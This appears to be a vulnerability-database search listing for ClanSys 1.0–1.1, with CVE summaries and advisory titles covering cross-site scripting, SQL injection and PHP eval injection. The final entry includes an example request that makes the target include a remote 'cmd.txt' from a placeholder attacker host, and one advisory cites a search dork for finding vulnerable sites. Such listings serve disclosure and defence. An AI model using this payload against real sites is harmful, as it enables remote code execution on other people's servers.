30 matches found
EUVD-2006-2369
Malware in sbrugna...
EUVD-2006-1709
Malware in sbrugna...
EUVD-2006-2368
Malware in sbrugna...
Clansys <= 1.1 (index.php page) PHP Code Insertion Vulnerability
No description provided by source. NukedX Security Advisory Nr 2006-29 ClanSys v1.1 index.php page PHP Code Insertion Vulnerability Method found & Exploit scripted by nukedx Contacts ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com Original advisory: http://www.nukedx.com/?viewdoc=29...
Clansys 1.1 (showid) - Remote SQL Injection Exploit
No description provided by source...
CVE-2006-2368
Cross-site scripting XSS vulnerability in index.php in Clansys aka Clanpage System 1.1 allows remote attackers to inject arbitrary web script or HTML via the page parameter...
CVE-2006-2367
Cross-site scripting XSS vulnerability in index.php in Clansys aka Clanpage System 1.0 and 1.1 allows remote attackers to inject arbitrary web script or HTML via the func parameter in a search function...
Cross site scripting
Cross-site scripting XSS vulnerability in index.php in Clansys aka Clanpage System 1.1 allows remote attackers to inject arbitrary web script or HTML via the page parameter...
Cross site scripting
Cross-site scripting XSS vulnerability in index.php in Clansys aka Clanpage System 1.0 and 1.1 allows remote attackers to inject arbitrary web script or HTML via the func parameter in a search function...
CVE-2006-2368
Cross-site scripting XSS vulnerability in index.php in Clansys aka Clanpage System 1.1 allows remote attackers to inject arbitrary web script or HTML via the page parameter...
CVE-2006-2367
Cross-site scripting XSS vulnerability in index.php in Clansys aka Clanpage System 1.0 and 1.1 allows remote attackers to inject arbitrary web script or HTML via the func parameter in a search function...
CVE-2006-2367
CVE-2006-2367 is a cross-site scripting (XSS) vulnerability in Clansys (Clanpage System) versions 1.0 and 1.1. The flaw resides in index.php where the search function passes a user-controlled func parameter, enabling remote attackers to inject arbitrary web script or HTML. The published entries c...
CVE-2006-2368
CVE-2006-2368 is an XSS vulnerability in Clansys (aka Clanpage System) 1.1, exploitable via the page parameter in index.php. The vulnerability permits remote attackers to inject arbitrary script/HTML. From the supplied sources (NVD/NIST), the attack vector is network-based with no authentication,...
Sql injection
Eval injection vulnerability in index.php in ClanSys 1.1 allows remote attackers to execute arbitrary PHP code via PHP code in the page parameter, as demonstrated by using an "include" statement that is injected into the eval statement. NOTE: this issue has been described as file inclusion by som...
CVE-2006-2005
Eval injection vulnerability in index.php in ClanSys 1.1 allows remote attackers to execute arbitrary PHP code via PHP code in the page parameter, as demonstrated by using an "include" statement that is injected into the eval statement. NOTE: this issue has been described as file inclusion by som...
CVE-2006-2005
CVE-2006-2005 affects ClanSys 1.1 (index.php). The vulnerability is an eval injection in the page parameter that allows remote attackers to execute arbitrary PHP code, demonstrated by injecting an include statement into the eval. Some sources describe it as a file inclusion, but the primary issue...
[Full-disclosure] Advisory: Clansys <= 1.1 PHP Code Insertion Vulnerability.
--Security Report-- Advisory: Clansys = 1.1 PHP Code Insertion Vulnerability. --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 23/04/06 21:07 PM --- Contacts: ICQ: 10072 MSN/Email: [email protected] Web: http://www.nukedx.com --- Vendor: Clansys http://www.clansys.de.vu/ Versio...
Clansys <= v.1.1 (index.php page) PHP Code Insertion Vulnerability
No description provided by source. NukedX Security Advisory Nr 2006-29 ClanSys v1.1 index.php page PHP Code Insertion Vulnerability Method found & Exploit scripted by nukedx Contacts ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com Original advisory: http://www.nukedx.com/?viewdoc=29...
Clansys 1.1 - 'index.php' PHP Code Insertion
NukedX Security Advisory Nr 2006-29 ClanSys v1.1 index.php page PHP Code Insertion Vulnerability Method found & Exploit scripted by nukedx Contacts ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com Original advisory: http://www.nukedx.com/?viewdoc=29 Dork: "ClanSys v.1.1" 2.400 pages. Fu...
Clansys <= v.1.1 (index.php page) PHP Code Insertion Vulnerability
Exploit for unknown platform in category web applications ================================================================== Clansys GET - http://victim/ClanSysPath/index.php?page=PHPCode EXAMPLE - http://victim/ClanSysPath/index.php?page=&s=http://yourhost.com/cmd.txt? 0day.today 2018-03-19...